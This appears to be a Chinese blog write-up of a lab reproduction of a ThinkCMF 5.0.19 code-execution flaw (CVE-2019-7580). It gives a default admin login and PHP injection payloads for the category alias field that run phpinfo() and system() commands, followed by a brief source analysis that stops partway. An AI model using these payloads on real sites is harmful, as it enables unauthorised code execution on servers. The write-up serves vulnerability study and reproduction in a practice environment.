[vulfocus漏洞复现]thinkcmf 代码执行漏洞复现 (CVE-2019-7580)phpinfo();ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPH

前言

ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. thinkcmf5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞。
文章也会在这里同步


0x01进入后台

进入后台路径为:http://ip:port/admin

0x02我们这里使用弱口令登录

账户密码:admin:123456
在这里插入图片描述

0x03进入添加分类页面

依次进入
1、门户管理
2、分类管理
3、添加分类

分类名称随便填
分类别名输入poc:

1'=>array(""),phpinfo(),'2

描述随便填
描述随便填
在这里插入图片描述
添加后,点击勾,点击显示,出现如下页面
在这里插入图片描述

复现成功

获取flag命令:

1'=>array(""),system(‘ls /tmp’),'2

在这里插入图片描述

获取system()命令:

1'=>array(""),system(‘whoami’),'2
1'=>array(""),system(‘pwd’),'2

0x04 利用过程与分析

这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞.

将payload插入数据库,写入data/conf/route.php文件

程序的入口是index.php,在index.php中\think\App::run()执行应用。

在App.php的run()函数139行,执行sef::exec();

  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爬虫数据分析师

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值